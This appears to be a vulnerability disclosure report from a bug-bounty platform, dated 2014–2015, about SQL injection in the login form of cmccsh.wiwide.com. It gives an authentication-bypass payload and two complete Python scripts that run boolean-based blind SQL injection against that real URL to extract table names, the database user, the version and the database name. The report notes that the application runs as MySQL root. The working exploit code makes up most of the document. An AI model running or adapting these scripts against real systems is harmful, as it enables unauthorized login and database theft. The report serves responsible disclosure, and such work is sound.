2014-12-24: Details reported to the vendor, awaiting vendor handling
2014-12-26: Vendor confirmed the issue; details disclosed to the vendor only
2015-01-05: Details disclosed to core white hats and experts in the relevant field
2015-01-15: Details disclosed to regular white hats
2015-01-25: Details disclosed to intern white hats
2015-02-07: Details disclosed to the public
http://cmccsh.wiwide.com/login: the login form can be bypassed with a "universal password" and is vulnerable to boolean-based blind SQL injection. Payload: admin' or 1=1#. When the injected condition is false:
When the injected condition is true:
Results obtained with the script: user: root@localhost; version: 5.5.37; database: ads. The first table in ads is ad_day, and it appears to be the only table; a count gave roughly 10000 rows. I did not write a further script to dump it. Note that the application connects to MySQL as root@localhost, i.e. the database superuser, so anything injectable through this form runs with full privileges on the server.
Script for extracting the table names
```python
# coding: utf-8
# date: 2014/12/18
# Boolean-based blind extraction of the table names in database `ads`
# (0x616473 is the hex encoding of 'ads') through the login form.
# Oracle: when the injected condition is true the login succeeds and the
# server answers with a redirect whose body is (almost) empty; when it is
# false the full login page comes back. len(body) < 10 therefore means "true".
import time

import requests

URL = "http://cmccsh.wiwide.com/login"

HEADERS = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Origin': 'http://cmccsh.wiwide.com/login',
    'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Referer': 'http://cmccsh.wiwide.com/login',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Cookie': 'JSESSIONID=aBBzLjv2g4je',
}


def blind_inject():
    # Charset tried in this order; 'r', 'o', 't' come first so that 'root'
    # is found with few requests. Only lowercase letters are tried, so the
    # extracted names are compared case-sensitively as the server stores them.
    payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'
    user = ''
    end = 0
    for i in range(1, 40):          # character positions 1..39
        if end == 1:
            break
        for j in payloads:
            time.sleep(1)
            # Is the i-th character of group_concat(table_name) equal to ord(j)?
            exp = ("or ( select (select ascii(substr(group_concat(table_name),%d,1)) "
                   "from information_schema.tables where table_schema=0x616473 limit 0,1)=%d)"
                   % (i, ord(j)))
            # The trailing '#' comments out the rest of the server's query
            # (the password check); the body is sent raw, unencoded.
            data = "username=admin' %s #&pwd=1&login=1" % exp
            r = requests.post(URL, data, headers=HEADERS, allow_redirects=False)
            find = (len(r.text) < 10)   # short body == redirect == condition true
            # Anything other than 200 on a "false" answer is treated as a
            # server hiccup: poll the page until it responds normally again.
            while r.status_code != 200 and not find:
                r = requests.get(URL)
            if find:
                user = user + j
                print('\n[*]Guessing ' + user, end='')
                time.sleep(1)
                break
            else:
                print('.', end='')
        # If the inner loop ran through the whole charset without a hit, the
        # last tried character is not the last recovered one: end of string.
        if not user[::-1].startswith(j):
            end = 1
    print('\n', user)


def run():
    blind_inject()


if __name__ == '__main__':
    run()
```
Script for extracting user, version and database
```python
# coding: utf-8
# date: 2014/12/18
# Same oracle and loop as the table-name script; only the injected
# expression differs. As written it extracts version(); swapping version()
# for user() or database() yields the other two values reported above
# (root@localhost, 5.5.37, ads). lower() keeps the result inside the
# lowercase charset tried below.
import time

import requests

URL = "http://cmccsh.wiwide.com/login"

HEADERS = {
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Origin': 'http://cmccsh.wiwide.com/login',
    'User-Agent': 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Referer': 'http://cmccsh.wiwide.com/login',
    'Accept-Encoding': 'gzip,deflate,sdch',
    'Accept-Language': 'zh-CN,zh;q=0.8',
    'Cookie': 'JSESSIONID=aBBzLjv2g4je',
}


def blind_inject():
    # 'r', 'o', 't' first so that 'root' is recovered quickly.
    payloads = 'rotabcdefghijklmnpqsuvwxyz0123456789@_.'
    user = ''
    end = 0
    for i in range(1, 40):          # character positions 1..39
        if end == 1:
            break
        for j in payloads:
            time.sleep(1)
            # Is the i-th character of lower(version()) equal to ord(j)?
            # Replace version() with user() or database() as needed.
            exp = "or ascii(MID(lower(version()),%d,1))= %s" % (i, ord(j))
            data = "username=admin' %s #&pwd=1&login=1" % exp
            r = requests.post(URL, data, headers=HEADERS, allow_redirects=False)
            find = (len(r.text) < 10)   # short body == redirect == condition true
            while r.status_code != 200 and not find:
                r = requests.get(URL)   # wait out a non-200 answer
            if find:
                user = user + j
                print('\n[*]Guessing ' + user, end='')
                time.sleep(1)
                break
            else:
                print('.', end='')
        # Whole charset tried without a hit at this position: end of string.
        if not user[::-1].startswith(j):
            end = 1
    print('\n', user)


def run():
    blind_inject()


if __name__ == '__main__':
    run()
```
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2014-12-26 18:17
The issue has been confirmed. Thanks to the white hat for the report!
None yet